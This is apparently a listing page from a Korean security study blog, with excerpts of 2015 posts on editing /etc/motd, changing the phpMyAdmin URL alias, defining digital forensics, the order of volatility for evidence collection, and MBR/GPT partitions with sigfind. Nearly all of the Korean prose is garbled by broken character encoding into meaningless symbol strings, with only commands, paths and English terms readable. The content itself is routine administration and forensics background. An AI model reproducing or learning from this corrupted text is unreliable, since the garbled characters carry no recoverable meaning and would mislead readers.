ํ๊ณ ๋์ root ๊ถํ์ผ๋ก vi /etc/motd์ ์น๋ฉด ์ฐฝ์ด ๋จ๋๋ฐ ํ๊ณ ์ถ์๋ง์ ์ ์ฅ ํ :wq ๋ก ์ ์ฅ์ ์๋ฃํ๋ฉด ์์ผ๋ก ์๋ฒ์ ์ ์ํ๋ฉด ๋ฐ๊ฒจ์ค ๊ฒ์ด๋ค.ํ๊ธ์ ์ด์ฉํ๊ณ ์ถ์ผ๋ฉด ํ๊ธํฉ์ ์ค์นํ๋ฉด ํ๊ธ ๊น์ง ์ฌ์ฉํ ์ ์๋ค. ๋ํ phpmyadmin์ฃผ์ ๋ณ๊ฒฝ์๋ phpmyadmin์ ์์ ๋๋ฉ์ธ/phpmyadmin์ด๋ฉด ์ ์์ ํ๋ค.์ด๋ฅผ ๋ฐ๊พธ๊ธฐ ์ํด ํ์ํ๊ฒ์ด vi /etc/phpmyadmin/apache.conf ์์ ์ ํด์ Alias /phpmyadmin /usr/share/phpmyadmin ์ด๊ฒ์ Alias /ํ๊ณ ์ถ์ ์ฃผ์/usr/share/phpmyadmin ํ.. Security Study/Server(Linux) 2015. 11. 11. ๋์งํธ ํฌ๋ ์์ด๋? ๋์งํธ ํฌ๋ ์์ด๋ ๋ฌด์์ผ๊น? ํฌ๋ ์ -> ๋ฒ์ํ์ปดํจํฐ ๋ฏธ๋์ด์ ์ ์์ ์ผ๋ก ์ ์ฅ๋ ๋ฐ์ดํฐ๋ฅผ ์ทจ๋,๋ณด์กด,๋ณต๊ตฌ,์ ์ถํ๋ ๊ฒ๊ณผ ๊ด๋ จ๋ ๋ฐฉ๋ฒ๋ก ์ด๋ค.๋ํ ๊ฒฝ์ฐฐ๊ณผ ๊ฒ์ฐฐ์ด ์ฐ๋ ์์ฌ ๊ธฐ๋ฒ์ค ํ๋์ด๋ค.์ฆ, ๋์งํธ ๊ธฐ๊ธฐ์์ ๋ง์ ์ ๋ณด๋ฅผ ์ฐพ๊ฑฐ๋ ๋ณต๊ตฌํ๋ ์ผ์ด๋ค. ๋ค๋ง ์ค์ํ์ ์ ํฌ๋ ์์ด ๋ฒ์ํ์ฒ๋ผ ๋ฒ์ ์์ ์ฌ์ฉ๋ ์ ์๋ค๋ ๊ฒ์ด๋ค. ํฌ๋ ์์ ์ข ๋ฅ์๋ ์ฌ๋ฌ๊ฐ์ง๊ฐ ์กด์ฌํ๋ค.์ปดํจํฐ ํฌ๋ ์, ๋ชจ๋ฐ์ผ ํฌ๋ ์, ์๋ฒ ๋๋ ํฌ๋ ์, ๋คํธ์ํฌ ํฌ๋ ์ ๋ฑ๋ฑ ํฌ๋ ์ ์ ์ฉ ๋ถ์ผ1 - ์ฌ์ด๋ฒ ๋ฒ์ฃ ๋ฐ ์ง๋ฅ ๋ฒ์ฃ2 - ์ผ๋ฐ ๋ฐ ๊ฐ๋ ฅ ๋ฒ์ฃ3 - ์ธํฐ๋ท ์นจํด์ฌ๊ณ ์กฐ์ฌ4 - ์ฌ์ฉ์์ ๋ถ์ ์ด๋ ๋ฒ์ฃ ํ์์ ๋ํ ์กฐ์ฌ For3nsic/Forensic 2015. 11. 10. ํ๋ฐ์ฑ ์์ And ํฌ๋ ์ ์์งํ ์ฆ๊ฑฐ์ ์ฐ์ ์์๋ฅผ ์ ํ๋ ๊ฒ์ด ์ข๋ค.๊ทธ๋ฌ๋ ํ๋ฐ์ฑ์ด ๊ฐํ ๊ฒ๋ถํฐ ์์งํ๋ ๊ฒ์ด ์ข์ ๋ฏํ๋ค. ํ๋ฐ์ฑ ์์1 - CPU, ์บ์ ๋ฐ ๋ ์ง์คํฐ ๋ฐ์ดํฐ2 - ๋ผ์ฐํ ํ ์ด๋ธ, ARP ์บ์, ํ๋ก์ธ์ค ํ ์ด๋ธ, ์ปค๋ ํต๊ณ3 - ๋ฉ๋ชจ๋ฆฌ4 - ์์ ํ์ผ ์์คํ / ์ค์ ๊ณต๊ฐ5 - ํ๋ ๋์คํฌ์ ์๋ ๋ฐ์ดํฐ6 - ์๊ฒฉ์ ์๋ ๋ก๊ทธ ๋ฐ์ดํฐ7 - ์์นด์ด๋ธ ๋งค์ฒด์ ์๋ ๋ฐ์ดํฐ RAM์ ์๋ ์ฆ๊ฑฐํ๋ฐ์ฑ ๋ฉ๋ชจ๋ฆฌ(RAM)์๋ ํ์ฌ ์คํ ์ค์ธ ํ๋ก์ธ์ค, ์คํ๋ ์ฝ์ ๋ช ๋ น์ด, ์ํธํ๋์ง ์์ ๋น๋ฐ๋ฒํธ, ์ํธํ๋์ง ์์ ๋ฐ์ดํฐ, ๋ฉ์ ์ ๋ด์ฉ, IP์ฃผ์, ์ ์ฑ์ฝ๋ ๋ฑ ์ค์ํ ์ฆ๊ฑฐ๊ฐ ์ ์ฅ๋์ด ์์์ ์๋ค. For3nsic/The Art of Memory Forensic 2015. 11. 10. ํํฐ์ ๋๊ณผ ๋์คํฌ๋ ์ด์์ ๋ฑ ํํฐ์ ๋๊ณผ ๋์คํฌ ๋ ์ด์์ ์ค๋๋ ๊ฐ์ฅ ๋ง์ด ์ฌ์ฉํ๋ ๋ ๊ฐ์ง ์ฃผ์ ํํฐ์ ๋ ๋ฐฉ์์ MBR(Master Boot Record) ๋ฐฉ์๊ณผ GUID Partition Table(GPT)์ด๋ค. MBR ํํฐ์ ๋ ๊ธฐ๋ฒ์ ๊ธฐ๋ณธ์ ์ผ๋ก ์ค์ง ๋ค ๊ฐ์ ํ๋ผ์ด๋จธ๋ฆฌ ํํฐ์ ๊ณผ ์ต๋ 2ํ ๋ผ๋ฐ์ดํธ ํฌ๊ธฐ์ ๋์คํฌ๋ง ์ง์ํ๋ค. GPT ํ์์ 8 ์ ํ๋ฐ์ดํธ ํฌ๊ธฐ์ ๋์คํฌ๊น์ง ์ง์ํ๋ฉฐ 128๊ฐ์ ํ๋ผ์ด๋จธ๋ฆฌ ํํฐ์ ์ ๋ง๋ค์ ์๋ค. ํํฐ์ ์๋ณ ๋ฐ ๋ณต๊ตฌ์ญ์ ๋๊ฑฐ๋ ์ฌ๋ผ์ง ํํฐ์ ์ ์๋ณํ ๋๋ ์์์ ์ธ๊ธํ sigfind ๋ช ๋ น์ ์ฌ์ฉํ ์ ์๋ค. ์ด ๋๊ตฌ๋ ํํฐ์ ํ ์ด๋ธ์ด๋ ํ์ผ ์์คํ ํค๋์ ์จ๊ธธ ์ ์๋ ํ์ ์ ์ฐพ์์ฃผ๋ ์ฌ์ ์ ์๋ ์ฌ๋ฌ ๋ฐ์ดํฐ ๊ตฌ์กฐ ํ ํ๋ ์ดํธ๋ฅผ ๊ฐ์ง๊ณ ์๋ค. RAIDRedundant Array of Inexpensive D.. For3nsic/Forensic 2015. 11. 10. ์ด์ 1 ยทยทยท 5 6 7 8 9 10 11 12 ๋ค์ 728x90 ๋ฐ์ํ